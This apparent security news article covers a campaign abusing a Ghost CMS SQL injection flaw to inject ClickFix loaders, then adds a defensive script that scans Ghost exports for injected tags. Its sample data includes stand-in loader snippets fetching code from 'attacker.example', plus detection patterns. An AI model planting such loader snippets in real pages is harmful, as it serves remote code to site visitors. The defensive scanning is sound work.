A large-scale campaign exploits a critical SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers the ClickFix attack flow.
The campaign was discovered by XLab threat intelligence researchers at Chinese cybersecurity company Qianxin and was confirmed to affect over 700 domains, including university portals, AI/SaaS companies, news organizations, fintech companies, security sites, and personal blogs.
Researchers said the attackers planted malicious code on the websites of Harvard University, Oxford University, Auburn University, and DuckDuckGo.

Supply: XLab
CVE-2026-26980 affects Ghost 3.24.0 through 6.19.0 and allows an unauthenticated attacker to read arbitrary data, including administrative API keys, from a website's database.
Such a key grants administrative access to users, articles, and themes, and can be used to modify article pages.
A fix for this issue was released in Ghost CMS version 6.19.1 on February 19th, but many sites failed to install the security update.
On February 27, SentinelOne published details about CVE-2026-26980 being used in attacks and how the resulting incidents can be detected. Researchers observed at least two different clusters of activity targeting vulnerable Ghost sites. Sometimes the same domain was re-infected with a different script after cleanup, or one cluster removed the other's script and injected its own.

Supply: XLab
Attack chain
The attacks observed by XLab begin by exploiting CVE-2026-26980 to steal administrative API keys, then use the resulting elevated privileges to inject malicious JavaScript into articles.
The JavaScript code is a lightweight loader that fetches second-stage code from the attacker's infrastructure, essentially a cloaking script that fingerprints the visitor to determine whether they qualify as a target.
Visitors who pass validation are served a fake Cloudflare prompt loaded via an iframe at the top of the article page. This prompt contains a ClickFix lure.

Supply: XLab
The page instructs victims to prove they are human by pasting the provided command into a Windows command prompt, which drops the payload on their system.
XLab has observed multiple payloads being used in these attacks, including a DLL loader, a JavaScript dropper, and an Electron-based malware sample named UtilifySetup.exe.
Supply: XLab
Reducing risk
The most important action for Ghost CMS site administrators is to upgrade to version 6.19.1 or later and rotate any previously used API keys, since they may have been exposed.
XLab provided a list of indicators of compromise (IoCs), including the injected scripts; site owners should review their sites thoroughly to identify and remove them.
Researchers recommend that site owners retain at least 30 days of administrative API call logs to enable reliable retrospective investigation.
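One way to carry out that review offline, as an added example that is not XLab's or Ghost's code: the script below reads a Ghost JSON content export (assumed to follow Ghost's `db[0].data.posts[].html` layout, with the Ghost version recorded in `db[0].meta.version`), checks the version against the affected range 3.24.0 through 6.19.0, and flags posts whose HTML loads a script or iframe from a host outside a per-site allowlist or contains an inline dynamic-script loader. The allowlist, the sample posts, and the `attacker.example` host are constructed for illustration and do not reproduce XLab's published IoCs.

```javascript
// Added example (not XLab's or Ghost's code): triage a Ghost JSON content export
// for injected <script>/<iframe> tags and check whether the exporting Ghost version
// falls inside the CVE-2026-26980 affected range (3.24.0 .. 6.19.0).
// Assumption: the export uses Ghost's db[0].meta.version and db[0].data.posts[].html layout.

// --- Version range check -----------------------------------------------------
function parseVersion(v) {
  return String(v).split('.').map((n) => parseInt(n, 10) || 0);
}
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if ((pa[i] || 0) !== (pb[i] || 0)) return (pa[i] || 0) < (pb[i] || 0) ? -1 : 1;
  }
  return 0;
}
function isAffectedVersion(version) {
  return compareVersions(version, '3.24.0') >= 0 && compareVersions(version, '6.19.0') <= 0;
}

// --- Content scan ------------------------------------------------------------
// Hosts this site legitimately embeds from (assumption: edit per site).
const ALLOWED_HOSTS = new Set(['cdn.example.org', 'www.youtube.com']);

// <script src=...> / <iframe src=...> with an absolute or protocol-relative URL.
const TAG_RE = /<(script|iframe)\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
// Inline <script> bodies (no src attribute); we look for loader idioms inside them.
const INLINE_SCRIPT_RE = /<script\b(?![^>]*\bsrc\s*=)[^>]*>([\s\S]*?)<\/script>/gi;
const LOADER_HINT_RE = /document\.createElement\(['"]script['"]\)|atob\(|fromCharCode/i;

// Resolve a src to a hostname; relative URLs resolve to the placeholder host.
function hostOf(url) {
  try { return new URL(url, 'https://placeholder.invalid').hostname; } catch { return null; }
}

function findInjectedTags(html) {
  const findings = [];
  for (const m of html.matchAll(TAG_RE)) {
    const [, tag, src] = m;
    const host = hostOf(src);
    if (!host || host === 'placeholder.invalid') continue; // same-origin/relative: skip
    if (!ALLOWED_HOSTS.has(host)) {
      findings.push({ tag: tag.toLowerCase(), src, reason: 'external host not allowlisted' });
    }
  }
  for (const m of html.matchAll(INLINE_SCRIPT_RE)) {
    if (LOADER_HINT_RE.test(m[1])) {
      findings.push({ tag: 'script', src: null, reason: 'inline loader pattern' });
    }
  }
  return findings;
}

function scanExport(exportJson) {
  const results = [];
  for (const db of exportJson.db) {
    for (const post of db.data.posts) {
      const hits = findInjectedTags(post.html || '');
      if (hits.length) results.push({ slug: post.slug, updated_at: post.updated_at, hits });
    }
  }
  return results;
}

function auditExport(exportJson) {
  const version = (exportJson.db[0] && exportJson.db[0].meta && exportJson.db[0].meta.version) || 'unknown';
  return { version, affected: isAffectedVersion(version), posts: scanExport(exportJson) };
}

// Constructed sample export: one clean post, one external loader, one inline loader.
const SAMPLE_EXPORT = {
  db: [{
    meta: { version: '6.18.0' },
    data: {
      posts: [
        { slug: 'clean-post', updated_at: '2026-02-10T09:00:00.000Z',
          html: '<p>Hello.</p><script src="https://cdn.example.org/embed.js"></script>' },
        { slug: 'welcome-post-compromised', updated_at: '2026-02-22T03:14:00.000Z',
          html: '<script src="https://attacker.example/loader.js"></script><p>Hello again.</p>' },
        { slug: 'inline-loader', updated_at: '2026-02-23T11:00:00.000Z',
          html: '<p>x</p><script>var s=document.createElement("script");s.src=atob("aHR0cHM6Ly9hdHRhY2tlci5leGFtcGxl");document.head.appendChild(s);</script>' },
      ],
    },
  }],
};

console.log(JSON.stringify(auditExport(SAMPLE_EXPORT), null, 2));
```

Run it with Node after replacing `SAMPLE_EXPORT` with a parsed export from Ghost Admin. The regexes are a triage aid, not a parser: anything flagged should be inspected by hand, and the export only covers post content, so Ghost's site-wide code injection settings and the active theme's files need a separate look. Finding and removing the scripts also does not replace rotating the exposed API keys.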